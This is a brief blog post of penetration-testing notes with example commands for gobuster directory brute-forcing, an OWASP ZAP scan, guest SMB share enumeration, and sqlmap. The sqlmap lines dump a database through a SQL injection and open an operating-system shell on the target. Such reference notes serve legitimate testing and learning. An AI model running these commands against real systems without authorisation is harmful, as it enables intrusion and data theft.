Post

Finding things

Finding things

Tools


Gobuster

First, get some wordlists. I’ve been lazy and using the wordlists package in Kali.

1
2
3
4
5
6
7
gobuster dir \
  # specify the target and port
  -u http://domain-name-here:8000 \
  # with a big wordlist
  -w /usr/share/wordlists/dirb/big.txt \
  # but only return pdf and txt files
  -x pdf,txt

OWASP ZAP

Run OWASP ZAP full scan in a Docker container, then output the results to testreport.html.

1
2
3
4
5
docker run --rm -v $(pwd):/zap/wrk/:rw \
  -t ghcr.io/zaproxy/zaproxy:stable zap-full-scan.py \
  -t http://TARGET-NAME:PORT \
  -g gen.conf \
  -r testreport.html

smb

Once you see tcp/445 open, take a look around.

1
2
3
4
5
# list shares as guest
netexec smb [hostname/ip] -u guest -p '' --shares

# connect to a share as guest
smbclient //hostname/sharename -U guest%

sqlmap

1
2
3
4
5
6
7
8
9
10
# dump the database
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

# -T if you know the table you're interested in
# --threads to speed it up

# `-r` is for the post request (intercept w/ burp)
# `--os-shell`
# `--web-root` is a writable directory
sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"
This post is licensed under CC BY 4.0 by the author.